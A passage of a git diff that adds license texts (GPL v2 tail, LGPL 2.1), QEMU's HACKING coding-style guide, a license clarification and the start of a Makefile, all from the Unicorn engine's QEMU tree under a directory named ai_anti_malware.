If the distribution and/or use of the Program is restricted in +certain countries either by patents or by copyrighted interfaces, the +original copyright holder who places the Program under this License +may add an explicit geographical distribution limitation excluding +those countries, so that distribution is permitted only in or among +countries not thus excluded. In such case, this License incorporates +the limitation as if written in the body of this License. + + 9. The Free Software Foundation may publish revised and/or new versions +of the General Public License from time to time. Such new versions will +be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + +Each version is given a distinguishing version number. If the Program +specifies a version number of this License which applies to it and "any +later version", you have the option of following the terms and conditions +either of that version or of any later version published by the Free +Software Foundation. If the Program does not specify a version number of +this License, you may choose any version ever published by the Free Software +Foundation. + + 10. If you wish to incorporate parts of the Program into other free +programs whose distribution conditions are different, write to the author +to ask for permission. For software which is copyrighted by the Free +Software Foundation, write to the Free Software Foundation; we sometimes +make exceptions for this. Our decision will be guided by the two goals +of preserving the free status of all derivatives of our free software and +of promoting the sharing and reuse of software generally. + + NO WARRANTY + + 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY +FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. 
EXCEPT WHEN +OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES +PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED +OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF +MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS +TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE +PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, +REPAIR OR CORRECTION. + + 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING +WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR +REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, +INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING +OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED +TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY +YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER +PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE +POSSIBILITY OF SUCH DAMAGES. + + END OF TERMS AND CONDITIONS + + How to Apply These Terms to Your New Programs + + If you develop a new program, and you want it to be of the greatest +possible use to the public, the best way to achieve this is to make it +free software which everyone can redistribute and change under these terms. + + To do so, attach the following notices to the program. It is safest +to attach them to the start of each source file to most effectively +convey the exclusion of warranty; and each file should have at least +the "copyright" line and a pointer to where the full notice is found. 
+ + <one line to give the program's name and a brief idea of what it does.> + Copyright (C) <year> <name of author> + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License along + with this program; if not, write to the Free Software Foundation, Inc., + 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. + +Also add information on how to contact you by electronic and paper mail. + +If the program is interactive, make it output a short notice like this +when it starts in an interactive mode: + + Gnomovision version 69, Copyright (C) year name of author + Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. + This is free software, and you are welcome to redistribute it + under certain conditions; type `show c' for details. + +The hypothetical commands `show w' and `show c' should show the appropriate +parts of the General Public License. Of course, the commands you use may +be called something other than `show w' and `show c'; they could even be +mouse-clicks or menu items--whatever suits your program. + +You should also get your employer (if you work as a programmer) or your +school, if any, to sign a "copyright disclaimer" for the program, if +necessary. Here is a sample; alter the names: + + Yoyodyne, Inc., hereby disclaims all copyright interest in the program + `Gnomovision' (which makes passes at compilers) written by James Hacker. 
+ + <signature of Ty Coon>, 1 April 1989 + Ty Coon, President of Vice + +This General Public License does not permit incorporating your program into +proprietary programs. If your program is a subroutine library, you may +consider it more useful to permit linking proprietary applications with the +library. If this is what you want to do, use the GNU Lesser General +Public License instead of this License. diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/COPYING.LIB b/ai_anti_malware/unicorn/unicorn-master/qemu/COPYING.LIB new file mode 100644 index 0000000..48afc2e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/COPYING.LIB @@ -0,0 +1,504 @@ + GNU LESSER GENERAL PUBLIC LICENSE + Version 2.1, February 1999 + + Copyright (C) 1991, 1999 Free Software Foundation, Inc. + 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + +[This is the first released version of the Lesser GPL. It also counts + as the successor of the GNU Library Public License, version 2, hence + the version number 2.1.] + + Preamble + + The licenses for most software are designed to take away your +freedom to share and change it. By contrast, the GNU General Public +Licenses are intended to guarantee your freedom to share and change +free software--to make sure the software is free for all its users. + + This license, the Lesser General Public License, applies to some +specially designated software packages--typically libraries--of the +Free Software Foundation and other authors who decide to use it. You +can use it too, but we suggest you first think carefully about whether +this license or the ordinary General Public License is the better +strategy to use in any particular case, based on the explanations below. + + When we speak of free software, we are referring to freedom of use, +not price. 
Our General Public Licenses are designed to make sure that +you have the freedom to distribute copies of free software (and charge +for this service if you wish); that you receive source code or can get +it if you want it; that you can change the software and use pieces of +it in new free programs; and that you are informed that you can do +these things. + + To protect your rights, we need to make restrictions that forbid +distributors to deny you these rights or to ask you to surrender these +rights. These restrictions translate to certain responsibilities for +you if you distribute copies of the library or if you modify it. + + For example, if you distribute copies of the library, whether gratis +or for a fee, you must give the recipients all the rights that we gave +you. You must make sure that they, too, receive or can get the source +code. If you link other code with the library, you must provide +complete object files to the recipients, so that they can relink them +with the library after making changes to the library and recompiling +it. And you must show them these terms so they know their rights. + + We protect your rights with a two-step method: (1) we copyright the +library, and (2) we offer you this license, which gives you legal +permission to copy, distribute and/or modify the library. + + To protect each distributor, we want to make it very clear that +there is no warranty for the free library. Also, if the library is +modified by someone else and passed on, the recipients should know +that what they have is not the original version, so that the original +author's reputation will not be affected by problems that might be +introduced by others. + + Finally, software patents pose a constant threat to the existence of +any free program. We wish to make sure that a company cannot +effectively restrict the users of a free program by obtaining a +restrictive license from a patent holder. 
Therefore, we insist that +any patent license obtained for a version of the library must be +consistent with the full freedom of use specified in this license. + + Most GNU software, including some libraries, is covered by the +ordinary GNU General Public License. This license, the GNU Lesser +General Public License, applies to certain designated libraries, and +is quite different from the ordinary General Public License. We use +this license for certain libraries in order to permit linking those +libraries into non-free programs. + + When a program is linked with a library, whether statically or using +a shared library, the combination of the two is legally speaking a +combined work, a derivative of the original library. The ordinary +General Public License therefore permits such linking only if the +entire combination fits its criteria of freedom. The Lesser General +Public License permits more lax criteria for linking other code with +the library. + + We call this license the "Lesser" General Public License because it +does Less to protect the user's freedom than the ordinary General +Public License. It also provides other free software developers Less +of an advantage over competing non-free programs. These disadvantages +are the reason we use the ordinary General Public License for many +libraries. However, the Lesser license provides advantages in certain +special circumstances. + + For example, on rare occasions, there may be a special need to +encourage the widest possible use of a certain library, so that it becomes +a de-facto standard. To achieve this, non-free programs must be +allowed to use the library. A more frequent case is that a free +library does the same job as widely used non-free libraries. In this +case, there is little to gain by limiting the free library to free +software only, so we use the Lesser General Public License. 
+ + In other cases, permission to use a particular library in non-free +programs enables a greater number of people to use a large body of +free software. For example, permission to use the GNU C Library in +non-free programs enables many more people to use the whole GNU +operating system, as well as its variant, the GNU/Linux operating +system. + + Although the Lesser General Public License is Less protective of the +users' freedom, it does ensure that the user of a program that is +linked with the Library has the freedom and the wherewithal to run +that program using a modified version of the Library. + + The precise terms and conditions for copying, distribution and +modification follow. Pay close attention to the difference between a +"work based on the library" and a "work that uses the library". The +former contains code derived from the library, whereas the latter must +be combined with the library in order to run. + + GNU LESSER GENERAL PUBLIC LICENSE + TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION + + 0. This License Agreement applies to any software library or other +program which contains a notice placed by the copyright holder or +other authorized party saying it may be distributed under the terms of +this Lesser General Public License (also called "this License"). +Each licensee is addressed as "you". + + A "library" means a collection of software functions and/or data +prepared so as to be conveniently linked with application programs +(which use some of those functions and data) to form executables. + + The "Library", below, refers to any such software library or work +which has been distributed under these terms. A "work based on the +Library" means either the Library or any derivative work under +copyright law: that is to say, a work containing the Library or a +portion of it, either verbatim or with modifications and/or translated +straightforwardly into another language. 
(Hereinafter, translation is +included without limitation in the term "modification".) + + "Source code" for a work means the preferred form of the work for +making modifications to it. For a library, complete source code means +all the source code for all modules it contains, plus any associated +interface definition files, plus the scripts used to control compilation +and installation of the library. + + Activities other than copying, distribution and modification are not +covered by this License; they are outside its scope. The act of +running a program using the Library is not restricted, and output from +such a program is covered only if its contents constitute a work based +on the Library (independent of the use of the Library in a tool for +writing it). Whether that is true depends on what the Library does +and what the program that uses the Library does. + + 1. You may copy and distribute verbatim copies of the Library's +complete source code as you receive it, in any medium, provided that +you conspicuously and appropriately publish on each copy an +appropriate copyright notice and disclaimer of warranty; keep intact +all the notices that refer to this License and to the absence of any +warranty; and distribute a copy of this License along with the +Library. + + You may charge a fee for the physical act of transferring a copy, +and you may at your option offer warranty protection in exchange for a +fee. + + 2. You may modify your copy or copies of the Library or any portion +of it, thus forming a work based on the Library, and copy and +distribute such modifications or work under the terms of Section 1 +above, provided that you also meet all of these conditions: + + a) The modified work must itself be a software library. + + b) You must cause the files modified to carry prominent notices + stating that you changed the files and the date of any change. 
+ + c) You must cause the whole of the work to be licensed at no + charge to all third parties under the terms of this License. + + d) If a facility in the modified Library refers to a function or a + table of data to be supplied by an application program that uses + the facility, other than as an argument passed when the facility + is invoked, then you must make a good faith effort to ensure that, + in the event an application does not supply such function or + table, the facility still operates, and performs whatever part of + its purpose remains meaningful. + + (For example, a function in a library to compute square roots has + a purpose that is entirely well-defined independent of the + application. Therefore, Subsection 2d requires that any + application-supplied function or table used by this function must + be optional: if the application does not supply it, the square + root function must still compute square roots.) + +These requirements apply to the modified work as a whole. If +identifiable sections of that work are not derived from the Library, +and can be reasonably considered independent and separate works in +themselves, then this License, and its terms, do not apply to those +sections when you distribute them as separate works. But when you +distribute the same sections as part of a whole which is a work based +on the Library, the distribution of the whole must be on the terms of +this License, whose permissions for other licensees extend to the +entire whole, and thus to each and every part regardless of who wrote +it. + +Thus, it is not the intent of this section to claim rights or contest +your rights to work written entirely by you; rather, the intent is to +exercise the right to control the distribution of derivative or +collective works based on the Library. 
+ +In addition, mere aggregation of another work not based on the Library +with the Library (or with a work based on the Library) on a volume of +a storage or distribution medium does not bring the other work under +the scope of this License. + + 3. You may opt to apply the terms of the ordinary GNU General Public +License instead of this License to a given copy of the Library. To do +this, you must alter all the notices that refer to this License, so +that they refer to the ordinary GNU General Public License, version 2, +instead of to this License. (If a newer version than version 2 of the +ordinary GNU General Public License has appeared, then you can specify +that version instead if you wish.) Do not make any other change in +these notices. + + Once this change is made in a given copy, it is irreversible for +that copy, so the ordinary GNU General Public License applies to all +subsequent copies and derivative works made from that copy. + + This option is useful when you wish to copy part of the code of +the Library into a program that is not a library. + + 4. You may copy and distribute the Library (or a portion or +derivative of it, under Section 2) in object code or executable form +under the terms of Sections 1 and 2 above provided that you accompany +it with the complete corresponding machine-readable source code, which +must be distributed under the terms of Sections 1 and 2 above on a +medium customarily used for software interchange. + + If distribution of object code is made by offering access to copy +from a designated place, then offering equivalent access to copy the +source code from the same place satisfies the requirement to +distribute the source code, even though third parties are not +compelled to copy the source along with the object code. + + 5. A program that contains no derivative of any portion of the +Library, but is designed to work with the Library by being compiled or +linked with it, is called a "work that uses the Library". 
Such a +work, in isolation, is not a derivative work of the Library, and +therefore falls outside the scope of this License. + + However, linking a "work that uses the Library" with the Library +creates an executable that is a derivative of the Library (because it +contains portions of the Library), rather than a "work that uses the +library". The executable is therefore covered by this License. +Section 6 states terms for distribution of such executables. + + When a "work that uses the Library" uses material from a header file +that is part of the Library, the object code for the work may be a +derivative work of the Library even though the source code is not. +Whether this is true is especially significant if the work can be +linked without the Library, or if the work is itself a library. The +threshold for this to be true is not precisely defined by law. + + If such an object file uses only numerical parameters, data +structure layouts and accessors, and small macros and small inline +functions (ten lines or less in length), then the use of the object +file is unrestricted, regardless of whether it is legally a derivative +work. (Executables containing this object code plus portions of the +Library will still fall under Section 6.) + + Otherwise, if the work is a derivative of the Library, you may +distribute the object code for the work under the terms of Section 6. +Any executables containing that work also fall under Section 6, +whether or not they are linked directly with the Library itself. + + 6. As an exception to the Sections above, you may also combine or +link a "work that uses the Library" with the Library to produce a +work containing portions of the Library, and distribute that work +under terms of your choice, provided that the terms permit +modification of the work for the customer's own use and reverse +engineering for debugging such modifications. 
+ + You must give prominent notice with each copy of the work that the +Library is used in it and that the Library and its use are covered by +this License. You must supply a copy of this License. If the work +during execution displays copyright notices, you must include the +copyright notice for the Library among them, as well as a reference +directing the user to the copy of this License. Also, you must do one +of these things: + + a) Accompany the work with the complete corresponding + machine-readable source code for the Library including whatever + changes were used in the work (which must be distributed under + Sections 1 and 2 above); and, if the work is an executable linked + with the Library, with the complete machine-readable "work that + uses the Library", as object code and/or source code, so that the + user can modify the Library and then relink to produce a modified + executable containing the modified Library. (It is understood + that the user who changes the contents of definitions files in the + Library will not necessarily be able to recompile the application + to use the modified definitions.) + + b) Use a suitable shared library mechanism for linking with the + Library. A suitable mechanism is one that (1) uses at run time a + copy of the library already present on the user's computer system, + rather than copying library functions into the executable, and (2) + will operate properly with a modified version of the library, if + the user installs one, as long as the modified version is + interface-compatible with the version that the work was made with. + + c) Accompany the work with a written offer, valid for at + least three years, to give the same user the materials + specified in Subsection 6a, above, for a charge no more + than the cost of performing this distribution. 
+ + d) If distribution of the work is made by offering access to copy + from a designated place, offer equivalent access to copy the above + specified materials from the same place. + + e) Verify that the user has already received a copy of these + materials or that you have already sent this user a copy. + + For an executable, the required form of the "work that uses the +Library" must include any data and utility programs needed for +reproducing the executable from it. However, as a special exception, +the materials to be distributed need not include anything that is +normally distributed (in either source or binary form) with the major +components (compiler, kernel, and so on) of the operating system on +which the executable runs, unless that component itself accompanies +the executable. + + It may happen that this requirement contradicts the license +restrictions of other proprietary libraries that do not normally +accompany the operating system. Such a contradiction means you cannot +use both them and the Library together in an executable that you +distribute. + + 7. You may place library facilities that are a work based on the +Library side-by-side in a single library together with other library +facilities not covered by this License, and distribute such a combined +library, provided that the separate distribution of the work based on +the Library and of the other library facilities is otherwise +permitted, and provided that you do these two things: + + a) Accompany the combined library with a copy of the same work + based on the Library, uncombined with any other library + facilities. This must be distributed under the terms of the + Sections above. + + b) Give prominent notice with the combined library of the fact + that part of it is a work based on the Library, and explaining + where to find the accompanying uncombined form of the same work. + + 8. 
You may not copy, modify, sublicense, link with, or distribute +the Library except as expressly provided under this License. Any +attempt otherwise to copy, modify, sublicense, link with, or +distribute the Library is void, and will automatically terminate your +rights under this License. However, parties who have received copies, +or rights, from you under this License will not have their licenses +terminated so long as such parties remain in full compliance. + + 9. You are not required to accept this License, since you have not +signed it. However, nothing else grants you permission to modify or +distribute the Library or its derivative works. These actions are +prohibited by law if you do not accept this License. Therefore, by +modifying or distributing the Library (or any work based on the +Library), you indicate your acceptance of this License to do so, and +all its terms and conditions for copying, distributing or modifying +the Library or works based on it. + + 10. Each time you redistribute the Library (or any work based on the +Library), the recipient automatically receives a license from the +original licensor to copy, distribute, link with or modify the Library +subject to these terms and conditions. You may not impose any further +restrictions on the recipients' exercise of the rights granted herein. +You are not responsible for enforcing compliance by third parties with +this License. + + 11. If, as a consequence of a court judgment or allegation of patent +infringement or for any other reason (not limited to patent issues), +conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot +distribute so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you +may not distribute the Library at all. 
For example, if a patent +license would not permit royalty-free redistribution of the Library by +all those who receive copies directly or indirectly through you, then +the only way you could satisfy both it and this License would be to +refrain entirely from distribution of the Library. + +If any portion of this section is held invalid or unenforceable under any +particular circumstance, the balance of the section is intended to apply, +and the section as a whole is intended to apply in other circumstances. + +It is not the purpose of this section to induce you to infringe any +patents or other property right claims or to contest validity of any +such claims; this section has the sole purpose of protecting the +integrity of the free software distribution system which is +implemented by public license practices. Many people have made +generous contributions to the wide range of software distributed +through that system in reliance on consistent application of that +system; it is up to the author/donor to decide if he or she is willing +to distribute software through any other system and a licensee cannot +impose that choice. + +This section is intended to make thoroughly clear what is believed to +be a consequence of the rest of this License. + + 12. If the distribution and/or use of the Library is restricted in +certain countries either by patents or by copyrighted interfaces, the +original copyright holder who places the Library under this License may add +an explicit geographical distribution limitation excluding those countries, +so that distribution is permitted only in or among countries not thus +excluded. In such case, this License incorporates the limitation as if +written in the body of this License. + + 13. The Free Software Foundation may publish revised and/or new +versions of the Lesser General Public License from time to time. 
+Such new versions will be similar in spirit to the present version, +but may differ in detail to address new problems or concerns. + +Each version is given a distinguishing version number. If the Library +specifies a version number of this License which applies to it and +"any later version", you have the option of following the terms and +conditions either of that version or of any later version published by +the Free Software Foundation. If the Library does not specify a +license version number, you may choose any version ever published by +the Free Software Foundation. + + 14. If you wish to incorporate parts of the Library into other free +programs whose distribution conditions are incompatible with these, +write to the author to ask for permission. For software which is +copyrighted by the Free Software Foundation, write to the Free +Software Foundation; we sometimes make exceptions for this. Our +decision will be guided by the two goals of preserving the free status +of all derivatives of our free software and of promoting the sharing +and reuse of software generally. + + NO WARRANTY + + 15. BECAUSE THE LIBRARY IS LICENSED FREE OF CHARGE, THERE IS NO +WARRANTY FOR THE LIBRARY, TO THE EXTENT PERMITTED BY APPLICABLE LAW. +EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR +OTHER PARTIES PROVIDE THE LIBRARY "AS IS" WITHOUT WARRANTY OF ANY +KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE +IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR +PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE +LIBRARY IS WITH YOU. SHOULD THE LIBRARY PROVE DEFECTIVE, YOU ASSUME +THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION. + + 16. 
IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN +WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY +AND/OR REDISTRIBUTE THE LIBRARY AS PERMITTED ABOVE, BE LIABLE TO YOU +FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR +CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE +LIBRARY (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING +RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A +FAILURE OF THE LIBRARY TO OPERATE WITH ANY OTHER SOFTWARE), EVEN IF +SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH +DAMAGES. + + END OF TERMS AND CONDITIONS + + How to Apply These Terms to Your New Libraries + + If you develop a new library, and you want it to be of the greatest +possible use to the public, we recommend making it free software that +everyone can redistribute and change. You can do so by permitting +redistribution under these terms (or, alternatively, under the terms of the +ordinary General Public License). + + To apply these terms, attach the following notices to the library. It is +safest to attach them to the start of each source file to most effectively +convey the exclusion of warranty; and each file should have at least the +"copyright" line and a pointer to where the full notice is found. + + <one line to give the library's name and a brief idea of what it does.> + Copyright (C) <year> <name of author> + + This library is free software; you can redistribute it and/or + modify it under the terms of the GNU Lesser General Public + License as published by the Free Software Foundation; either + version 2 of the License, or (at your option) any later version. + + This library is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + Lesser General Public License for more details. 
+ + You should have received a copy of the GNU Lesser General Public + License along with this library; if not, write to the Free Software + Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA + +Also add information on how to contact you by electronic and paper mail. + +You should also get your employer (if you work as a programmer) or your +school, if any, to sign a "copyright disclaimer" for the library, if +necessary. Here is a sample; alter the names: + + Yoyodyne, Inc., hereby disclaims all copyright interest in the + library `Frob' (a library for tweaking knobs) written by James Random Hacker. + + <signature of Ty Coon>, 1 April 1990 + Ty Coon, President of Vice + +That's all there is to it! + + diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/HACKING b/ai_anti_malware/unicorn/unicorn-master/qemu/HACKING new file mode 100644 index 0000000..12fbc8a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/HACKING @@ -0,0 +1,159 @@ +1. Preprocessor + +For variadic macros, stick with this C99-like syntax: + +#define DPRINTF(fmt, ...) \ + do { printf("IRQ: " fmt, ## __VA_ARGS__); } while (0) + +2. C types + +It should be common sense to use the right type, but we have collected +a few useful guidelines here. + +2.1. Scalars + +If you're using "int" or "long", odds are good that there's a better type. +If a variable is counting something, it should be declared with an +unsigned type. + +If it's host memory-size related, size_t should be a good choice (use +ssize_t only if required). Guest RAM memory offsets must use ram_addr_t, +but only for RAM, it may not cover whole guest address space. + +If it's file-size related, use off_t. +If it's file-offset related (i.e., signed), use off_t. +If it's just counting small numbers use "unsigned int"; +(on all but oddball embedded systems, you can assume that that +type is at least four bytes wide). 
+ +In the event that you require a specific width, use a standard type +like int32_t, uint32_t, uint64_t, etc. The specific types are +mandatory for VMState fields. + +Don't use Linux kernel internal types like u32, __u32 or __le32. + +Use hwaddr for guest physical addresses except pcibus_t +for PCI addresses. In addition, ram_addr_t is a QEMU internal address +space that maps guest RAM physical addresses into an intermediate +address space that can map to host virtual address spaces. Generally +speaking, the size of guest memory can always fit into ram_addr_t but +it would not be correct to store an actual guest physical address in a +ram_addr_t. + +For CPU virtual addresses there are several possible types. +vaddr is the best type to use to hold a CPU virtual address in +target-independent code. It is guaranteed to be large enough to hold a +virtual address for any target, and it does not change size from target +to target. It is always unsigned. +target_ulong is a type the size of a virtual address on the CPU; this means +it may be 32 or 64 bits depending on which target is being built. It should +therefore be used only in target-specific code, and in some +performance-critical built-per-target core code such as the TLB code. +There is also a signed version, target_long. +abi_ulong is for the *-user targets, and represents a type the size of +'void *' in that target's ABI. (This may not be the same as the size of a +full CPU virtual address in the case of target ABIs which use 32 bit pointers +on 64 bit CPUs, like sparc32plus.) Definitions of structures that must match +the target's ABI must use this type for anything that on the target is defined +to be an 'unsigned long' or a pointer type. +There is also a signed version, abi_long. + +Of course, take all of the above with a grain of salt. If you're about +to use some system interface that requires a type like size_t, pid_t or +off_t, use matching types for any corresponding variables. 
+ +Also, if you try to use e.g., "unsigned int" as a type, and that +conflicts with the signedness of a related variable, sometimes +it's best just to use the *wrong* type, if "pulling the thread" +and fixing all related variables would be too invasive. + +Finally, while using descriptive types is important, be careful not to +go overboard. If whatever you're doing causes warnings, or requires +casts, then reconsider or ask for help. + +2.2. Pointers + +Ensure that all of your pointers are "const-correct". +Unless a pointer is used to modify the pointed-to storage, +give it the "const" attribute. That way, the reader knows +up-front that this is a read-only pointer. Perhaps more +importantly, if we're diligent about this, when you see a non-const +pointer, you're guaranteed that it is used to modify the storage +it points to, or it is aliased to another pointer that is. + +2.3. Typedefs +Typedefs are used to eliminate the redundant 'struct' keyword. + +2.4. Reserved namespaces in C and POSIX +Underscore capital, double underscore, and underscore 't' suffixes should be +avoided. + +3. Low level memory management + +Use of the malloc/free/realloc/calloc/valloc/memalign/posix_memalign +APIs is not allowed in the QEMU codebase. Instead of these routines, +use the GLib memory allocation routines g_malloc/g_malloc0/g_new/ +g_new0/g_realloc/g_free or QEMU's qemu_memalign/qemu_blockalign/qemu_vfree +APIs. + +Please note that g_malloc will exit on allocation failure, so there +is no need to test for failure (as you would have to with malloc). +Calling g_malloc with a zero size is valid and will return NULL. + +Memory allocated by qemu_memalign or qemu_blockalign must be freed with +qemu_vfree, since breaking this will cause problems on Win32. + +4. String manipulation + +Do not use the strncpy function. As mentioned in the man page, it does *not* +guarantee a NULL-terminated buffer, which makes it extremely dangerous to use. 
+It also zeros trailing destination bytes out to the specified length. Instead, +use this similar function when possible, but note its different signature: +void pstrcpy(char *dest, int dest_buf_size, const char *src) + +Don't use strcat because it can't check for buffer overflows, but: +char *pstrcat(char *buf, int buf_size, const char *s) + +The same limitation exists with sprintf and vsprintf, so use snprintf and +vsnprintf. + +QEMU provides other useful string functions: +int strstart(const char *str, const char *val, const char **ptr) +int stristart(const char *str, const char *val, const char **ptr) +int qemu_strnlen(const char *s, int max_len) + +There are also replacement character processing macros for isxyz and toxyz, +so instead of e.g. isalnum you should use qemu_isalnum. + +Because of the memory management rules, you must use g_strdup/g_strndup +instead of plain strdup/strndup. + +5. Printf-style functions + +Whenever you add a new printf-style function, i.e., one with a format +string argument and following "..." in its prototype, be sure to use +gcc's printf attribute directive in the prototype. + +This makes it so gcc's -Wformat and -Wformat-security options can do +their jobs and cross-check format strings with the number and types +of arguments. + +6. C standard, implementation defined and undefined behaviors + +C code in QEMU should be written to the C99 language specification. A copy +of the final version of the C99 standard with corrigenda TC1, TC2, and TC3 +included, formatted as a draft, can be downloaded from: + http://www.open-std.org/jtc1/sc22/WG14/www/docs/n1256.pdf + +The C language specification defines regions of undefined behavior and +implementation defined behavior (to give compiler authors enough leeway to +produce better code). In general, code in QEMU should follow the language +specification and avoid both undefined and implementation defined +constructs. ("It works fine on the gcc I tested it with" is not a valid +argument...) 
However there are a few areas where we allow ourselves to +assume certain behaviors because in practice all the platforms we care about +behave in the same way and writing strictly conformant code would be +painful. These are: + * you may assume that integers are 2s complement representation + * you may assume that right shift of a signed integer duplicates + the sign bit (ie it is an arithmetic shift, not a logical shift) diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/LICENSE b/ai_anti_malware/unicorn/unicorn-master/qemu/LICENSE new file mode 100644 index 0000000..da70e94 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/LICENSE @@ -0,0 +1,21 @@ +The following points clarify the QEMU license: + +1) QEMU as a whole is released under the GNU General Public License, +version 2. + +2) Parts of QEMU have specific licenses which are compatible with the +GNU General Public License, version 2. Hence each source file contains +its own licensing information. Source files with no licensing information +are released under the GNU General Public License, version 2 or (at your +option) any later version. + +As of July 2013, contributions under version 2 of the GNU General Public +License (and no later version) are only accepted for the following files +or directories: bsd-user/, linux-user/, hw/misc/vfio.c, hw/xen/xen_pt*. + +3) The Tiny Code Generator (TCG) is released under the BSD license + (see license headers in files). + +4) QEMU is a trademark of Fabrice Bellard. + +Fabrice Bellard and the QEMU team diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/Makefile b/ai_anti_malware/unicorn/unicorn-master/qemu/Makefile new file mode 100644 index 0000000..8e5762e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/Makefile @@ -0,0 +1,115 @@ +# Makefile for QEMU - modified for Unicorn engine. + +# Always point to the root of the build tree (needs GNU make). 
+BUILD_DIR=$(CURDIR) + +# All following code might depend on configuration variables +ifneq ($(wildcard config-host.mak),) +# Put the all: rule here so that config-host.mak can contain dependencies. +all: +include config-host.mak + +# Check that we're not trying to do an out-of-tree build from +# a tree that's been used for an in-tree build. +ifneq ($(realpath $(SRC_PATH)),$(realpath .)) +ifneq ($(wildcard $(SRC_PATH)/config-host.mak),) +$(error This is an out of tree build but your source tree ($(SRC_PATH)) \ +seems to have been used for an in-tree build. You can fix this by running \ +"make distclean && rm -rf *-linux-user *-softmmu" in your source tree) +endif +endif + +CONFIG_SOFTMMU := $(if $(filter %-softmmu,$(TARGET_DIRS)),y) +-include config-all-devices.mak + +include $(SRC_PATH)/rules.mak +config-host.mak: $(SRC_PATH)/configure + @echo $@ is out-of-date, running configure +else +config-host.mak: +ifneq ($(filter-out %clean,$(MAKECMDGOALS)),$(if $(MAKECMDGOALS),,fail)) + @echo "Please call configure before running make!" 
